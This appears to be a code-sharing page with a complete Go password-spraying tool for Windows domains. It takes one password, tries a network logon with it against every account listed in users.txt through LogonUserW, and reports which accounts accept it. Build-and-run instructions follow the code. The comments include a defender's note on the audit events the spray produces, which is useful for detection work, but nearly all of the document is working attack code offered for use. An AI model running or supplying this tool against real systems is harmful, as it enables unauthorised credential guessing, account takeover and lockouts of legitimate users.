GoLang. Domain password spray script. Runs on Windows.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
| package main | |
| import ( | |
| "fmt" | |
| "io/ioutil" | |
| "strings" | |
| "syscall" | |
| "unicode/utf16" | |
| "unsafe" | |
| "golang.org/x/text/encoding/unicode" | |
| ) | |
// Win32 values used by LogonUser in this file: two arguments handed to
// LogonUserW and the one error code that is mapped to a friendlier message.
const (
	// LOGON32_LOGON_NETWORK is passed as the logon-type argument of LogonUserW.
	LOGON32_LOGON_NETWORK = 3

	// LOGON32_PROVIDER_DEFAULT is passed as the logon-provider argument of LogonUserW.
	LOGON32_PROVIDER_DEFAULT = 0

	// ERROR_LOGON_FAILURE (0x52e) is the error code LogonUser reports as
	// "invalid credentials"; every other failure is returned unchanged.
	ERROR_LOGON_FAILURE uint32 = 1326
)
// Lazily bound Windows libraries. Nothing is loaded until a procedure from
// the library is first used.
//
// NOTE(review): syscall.NewLazyDLL is given a bare file name, so the library
// is located through the normal DLL search order. The syscall documentation
// warns about DLL preloading for this form; golang.org/x/sys/windows provides
// NewLazySystemDLL, which restricts the search to the system directory.
var (
	modadvapi32 = syscall.NewLazyDLL("advapi32.dll")
	modkernel32 = syscall.NewLazyDLL("kernel32.dll")
)

// Procedures resolved from the libraries above.
var (
	// procLogonUser is LogonUserW from advapi32.dll.
	procLogonUser = modadvapi32.NewProc("LogonUserW")

	// procCloseHandle is CloseHandle from kernel32.dll.
	procCloseHandle = modkernel32.NewProc("CloseHandle")
)
// main reads a domain and one password from standard input, loads the account
// list from users.txt (decoded as UTF-16 little-endian), and makes a single
// LogonUser call for every non-blank line, printing the result per account.
//
// Defender's view: the run is one password tried once against each listed
// account from a single host. What it leaves behind is a burst of failed
// network-type logons spread over many distinct accounts in a short window
// (on Windows typically failed-logon audit events such as Security event 4625
// with logon type 3, plus credential-validation failures on the domain
// controller). Each miss also counts toward that account's bad-password
// counter, so a low per-account failure count across many accounts is the
// pattern to alert on rather than many failures on one account.
func main() {
	var domain, password string

	fmt.Print("Domain: ")
	fmt.Scanln(&domain)

	// fmt.Scanln does not disable terminal echo, so the password is visible
	// while it is typed; its return values are not checked here.
	fmt.Print("Password: ")
	fmt.Scanln(&password)

	// The account list is a fixed relative path in the working directory.
	raw, err := ioutil.ReadFile("users.txt")
	if err != nil {
		fmt.Println("Error reading file:", err)
		return
	}

	// The file is treated as UTF-16LE; IgnoreBOM means a byte-order mark is
	// not interpreted by the decoder.
	utf16le := unicode.UTF16(unicode.LittleEndian, unicode.IgnoreBOM)
	text, err := utf16le.NewDecoder().Bytes(raw)
	if err != nil {
		fmt.Println("Error decoding file:", err)
		return
	}

	for _, entry := range strings.Split(string(text), "\n") {
		entry = strings.TrimSpace(entry)
		if entry == "" {
			continue
		}

		// Round-trip through UTF-16 code units, as the original does;
		// UTF16ToString stops at the first NUL code unit.
		name := syscall.UTF16ToString(utf16.Encode([]rune(entry)))

		// One logon attempt per account against the supplied domain.
		if err = LogonUser(name, domain, password); err != nil {
			fmt.Printf("Authentication failed for username '%s': %v\n", name, err)
			continue
		}
		fmt.Printf("Authentication successful for username '%s'\n", name)
	}
}
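// LogonUser makes one LogonUserW call for username in domain with password,
// using the LOGON32_LOGON_NETWORK logon type and the default provider.
//
// It returns nil when the call succeeds, an "invalid credentials" error when
// the call fails with ERROR_LOGON_FAILURE, and the raw error from the call for
// any other failure. An argument that cannot be converted to a NUL-terminated
// UTF-16 string (it contains a NUL byte) is rejected before any call is made;
// previously the conversion error was discarded and a nil pointer was passed
// to LogonUserW in its place.
func LogonUser(username, domain, password string) error {
	usr, err := syscall.UTF16PtrFromString(username)
	if err != nil {
		return fmt.Errorf("encoding username: %w", err)
	}
	dom, err := syscall.UTF16PtrFromString(domain)
	if err != nil {
		return fmt.Errorf("encoding domain: %w", err)
	}
	pwd, err := syscall.UTF16PtrFromString(password)
	if err != nil {
		return fmt.Errorf("encoding password: %w", err)
	}

	var token syscall.Handle
	ret, _, callErr := procLogonUser.Call(
		uintptr(unsafe.Pointer(usr)),
		uintptr(unsafe.Pointer(dom)),
		uintptr(unsafe.Pointer(pwd)),
		LOGON32_LOGON_NETWORK,
		LOGON32_PROVIDER_DEFAULT,
		uintptr(unsafe.Pointer(&token)),
	)

	// A zero return means the logon was refused; callErr carries the reason.
	if ret == 0 {
		if errno, ok := callErr.(syscall.Errno); ok && errno == syscall.Errno(ERROR_LOGON_FAILURE) {
			return fmt.Errorf("invalid credentials")
		}
		return callErr
	}

	// On success LogonUserW hands back a token handle for the account. It is
	// not used for anything here, so release it immediately instead of
	// keeping it open in the process.
	procCloseHandle.Call(uintptr(token))
	return nil
}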
You’ll need to run:
go mod init module
go get -u golang.org/x/text/encoding/unicode
That creates a go.mod file, then fetches the golang.org/x/text module that provides the encoding/unicode package. It's a hack to get the compiler to stop yelling at you.
go run pass-spray.go
-or-
go build pass-spray.go